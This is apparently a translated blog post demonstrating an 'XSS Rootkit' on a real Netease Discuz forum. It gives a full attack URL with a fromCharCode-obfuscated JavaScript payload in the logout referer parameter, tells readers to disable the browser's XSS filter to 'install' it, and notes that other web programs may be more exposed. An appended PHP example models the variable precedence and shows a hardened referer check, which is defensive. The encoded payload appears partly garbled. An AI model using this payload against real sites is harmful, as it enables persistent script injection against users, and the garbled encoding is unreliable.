XSS Rootkit: http://www.bkjia.com/Article/201110/107620.html
However, I still don't feel comfortable. I don't need to lose some practical things, so it's easy for others to understand. So I have to take a website for practical testing.
I took a DISCUZ non-persistent XSS for the test, and IE8 intercepts it. Therefore, we need to disable the XSS filter to succeed. In addition, I used a Netease website for the test. Please forgive me.
1. Access the URL below to install the XSS Rootkit. (Copy and paste the URL to access it; Baidu filters the keywords in the URL.)
http://bbs.game.163.com/logging.php?action=logout&referer=javascript:eval (String. fromCharCode (80,101,114,115,105,115,116,101,110, 99,101, 95,100, 97,116, 39,106, 97,118, 97,115, 99,114,105,112,116, 108,101,114,116, 120,115,115, 116,101, 61,110,101,119, 97,116,101, 10,118, 97,114, 32,101,120,112,105,114,101, 121,115, 116,101, 46,115,101,116, 84,105,109,101, 40,100, 97,116,101, 46,103,101,116, 84,105,109,101, 43,101,120,112,105,114,101, 121,115, 10,100,111, 99,117,109,101,110,116, 111,111,107,105,101, 114,101,102,101,114,101,114, 101,114,115,105,115,116,101,110, 99,101, 95,100, 97,116, 101,120,112,105,114,101,115, 43,100, 97,116,101, 46,116,111, 116,114,105,110,103, 97,108,101,114,116, 88,115,115, 111,111,116,107,105,116, 110,115,116, 97,108,108, 99,101,115,115,102,117,108,) & formhash = rootkit
2. Close the browser, then access the following URL again to see the effect.
http://bbs.game.163.com/logging.php?action=logout&formhash=testvul
3. Because DISCUZ registers variables in the order COOKIE, POST, GET (the loop below), a cookie value cannot affect a variable that has also been registered from GET. In addition, when you log out with a valid formhash, referer receives an initialized value and this XSS vulnerability no longer works. So our XSS Rootkit is somewhat discounted here, but what about other WEB programs :)
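// DISCUZ registers request variables in this order: COOKIE, then POST, then GET
foreach (array('_COOKIE', '_POST', '_GET') as $_request) {
    foreach ($$_request as $_key => $_value) {
        // skip keys beginning with '_'; otherwise create $<key> from the escaped value
        $_key{0} != '_' && $$_key = daddslashes($_value);
    }
}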
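The precedence described in step 3, as an added example that is not DISCUZ code or the author's: `register_vars()` models the quoted loop on constructed arrays, and `safe_referer()` is a hypothetical hardened lookup that never reads the redirect target from a cookie and rejects anything other than a relative path or an http(s) URL on the expected host. The function names and the host `bbs.example` are assumptions.

```php
<?php
// Added example on constructed data; not DISCUZ code.

// Same precedence as the loop quoted above: COOKIE, then POST, then GET.
// A later source overwrites an earlier one; keys starting with '_' are skipped.
function register_vars(array $cookie, array $post, array $get): array
{
    $vars = [];
    foreach ([$cookie, $post, $get] as $source) {
        foreach ($source as $key => $value) {
            $key = (string) $key;
            if ($key !== '' && $key[0] !== '_') {
                $vars[$key] = addslashes((string) $value); // stand-in for daddslashes()
            }
        }
    }
    return $vars;
}

// Hypothetical hardened lookup: the redirect target is never taken from a
// cookie, and only a plain relative path or an http(s) URL on $host passes.
function safe_referer(array $get, array $post, string $host, string $default = 'index.php'): string
{
    $raw = $get['referer'] ?? $post['referer'] ?? '';
    if (!is_string($raw) || $raw === '') {
        return $default;
    }
    $parts = parse_url($raw);
    if ($parts === false) {
        return $default;
    }
    if (!isset($parts['scheme']) && !isset($parts['host'])) {
        // Relative target: allow a conservative character set only.
        return preg_match('#^[A-Za-z0-9_./?&=%-]+$#', $raw) === 1 ? $raw : $default;
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    $sameHost = strcasecmp($parts['host'] ?? '', $host) === 0;
    return (in_array($scheme, ['http', 'https'], true) && $sameHost) ? $raw : $default;
}

// Constructed sample: a referer cookie left behind by an earlier reflected XSS.
$cookie = ['referer' => 'javascript:alert(1)'];
$host = 'bbs.example'; // placeholder host

var_dump(register_vars($cookie, [], [])['referer']);                         // request carries no referer
var_dump(register_vars($cookie, [], ['referer' => 'index.php'])['referer']); // GET supplies referer
var_dump(safe_referer([], [], $host));                                       // cookie is not consulted
var_dump(safe_referer(['referer' => 'javascript:alert(1)'], [], $host));     // non-http(s) scheme
var_dump(safe_referer(['referer' => 'http://bbs.example/forum.php'], [], $host));
```

A value that passes `safe_referer()` still needs `htmlspecialchars()` when it is written into the page.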
Author: RAyh4c Black Box